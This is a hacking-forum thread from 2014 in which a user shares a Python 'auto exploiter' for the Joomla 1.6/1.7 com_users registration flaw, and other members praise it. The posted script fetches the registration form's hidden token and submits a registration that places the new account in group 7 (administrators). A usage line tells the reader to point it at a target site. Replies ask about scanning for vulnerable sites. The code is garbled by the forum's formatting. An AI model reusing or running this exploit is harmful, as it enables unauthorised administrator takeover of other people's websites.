Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Joomla Com_User Auto Exploiter Python

  • 2 Vote(s) - 3.5 Average


04-27-2014, 06:53 AM #1
xSecurity Offline Respected *****
Respected
Posts:31 Threads:11 Joined:Oct 2013 Reputation: 3
Mood: Angry
Hello Guys

Automatic Exploit Com_User On Joomla [1.6|1.7]

VideoOn YouTube
http://www.youtube.com/watch?v=SHbTNPpx4_0

Pastebin
http://pastebin.com/MQWFJC1T

Source :
PHP Code:
#!/usr/bin/python
# Joomla Com_User Auto Exploit =D
# By xSecurity

import requests as sec4everreurllibsysos
from threading import Thread 
from time import sleep
def cls
():
    
os.system(['clear','cls'][os.name =='nt'])

cls()
print 
'''
       __                      _ _         
__  __/ _\ ___  ___ _   _ _ __(_) |_ _   _ 
\ \/ /\ \ / _ \/ __| | | | '
__| | __| | | |
 >  < 
_\ \  __/ (__| |_| | |  | | |_| |_| |
/
_/\_\\__/\___|\___|\__,|_|  |_|\__|\__, |
                                     |
___/Joomla [Com_UserAuto Exploit =D
#Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
#Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin 
Special For My Lov3r Cyber-Crystal
#Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''

pwd2 'fio3jfiej9cewc9c9w0eufew9u'
def one(target,pwd1,pwd2,email):
    
# Wrong Password
    
x1 xsec.get(target+'/index.php?option=com_users&view=registration')
    
token re.findall('type="hidden" name="(.*?)" value="1"'x1.text)
    
post = {}
    
post["jform[name]"] = 'xSecurity'
    
post["jform[username]"] = user
    post
["jform[password1]"] = pwd1
    post
["jform[password2]"] = pwd2
    post
["jform[email1]"] = email
    post
["jform[email2]"] = email
    post
["jform[groups][]"] = "7"
    
post["option"] = "com_users"
    
post["task"] = "registration.register"
    
post[token[0]] = "1"
    
p1 xsec.post(target+'/index.php?option=com_users&view=registration'data=urllib.urlencode(post))
    
x2 xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

def exploit(target,pwd1,pwd2,email):
    
# Wrong Password
    
x3 xsec.get(target+'/index.php?option=com_users&view=registration')
    
token re.findall('type="hidden" name="(.*?)" value="1"'x3.text)
    
post = {}
    
post["jform[name]"] = 'xSecurity'
    
post["jform[username]"] = user
    post
["jform[password1]"] = pwd1
    post
["jform[password2]"] = pwd1
    post
["jform[email1]"] = email
    post
["jform[email2]"] = email
    post
["jform[groups][]"] = "7"
    
post["option"] = "com_users"
    
post["task"] = "registration.register"
    
post[token[0]] = "1"
    
p2 xsec.post(target+'/index.php?option=com_users&view=registration'data=urllib.urlencode(post))
    
x4 xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

xsec sec4ever.session()
if 
len(sys.argv) == 5:
    
target sys.argv[1]
    
user sys.argv[2]
    
pwd1 sys.argv[3]
    
email sys.argv[4]
    
one(target,pwd1,pwd2,email)
    
ex exploit(target,pwd1,pwd2,email)
    print 
'[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
else:
    print 
"Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail" 

All The Best =D

04-27-2014, 07:17 AM #2
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
wow is amazing good job bro

but is com_users no com_user

04-27-2014, 04:18 PM #3
xSecurity Offline Respected *****
Respected
Posts:31 Threads:11 Joined:Oct 2013 Reputation: 3
Mood: Angry
(04-27-2014, 07:17 AM)CrashBandicot Wrote:  wow is amazing good job bro

but is com_users no com_user
lol its same Biggrinsmiley
1+1=99 Cool

04-27-2014, 11:18 PM #4
the nightmare Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:301 Threads:49 Joined:Apr 2014 Reputation: 8
Mood: Hacker
nice share bro

05-12-2014, 12:50 AM #5
_Defender_ Offline Junior Member **
Registered
Posts:23 Threads:8 Joined:May 2014 Reputation: 0
Mood: Excited
Great Tool Biggrinsmiley
Bro I m using Ur Tool "Com_user Scanner"
Which Gives Vulnerable sites Biggrinsmiley
These Site Are 100% vulnerable ? or this tool Scan only that sites which have Com_users component ?

06-10-2014, 02:33 PM #6
Rebelss Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jun 2014 Reputation: 0
Mood: Heartbroken
nice broda Biggrinsmiley Biggrinsmiley






Forum Jump:


Users browsing this thread:1 Guest(s)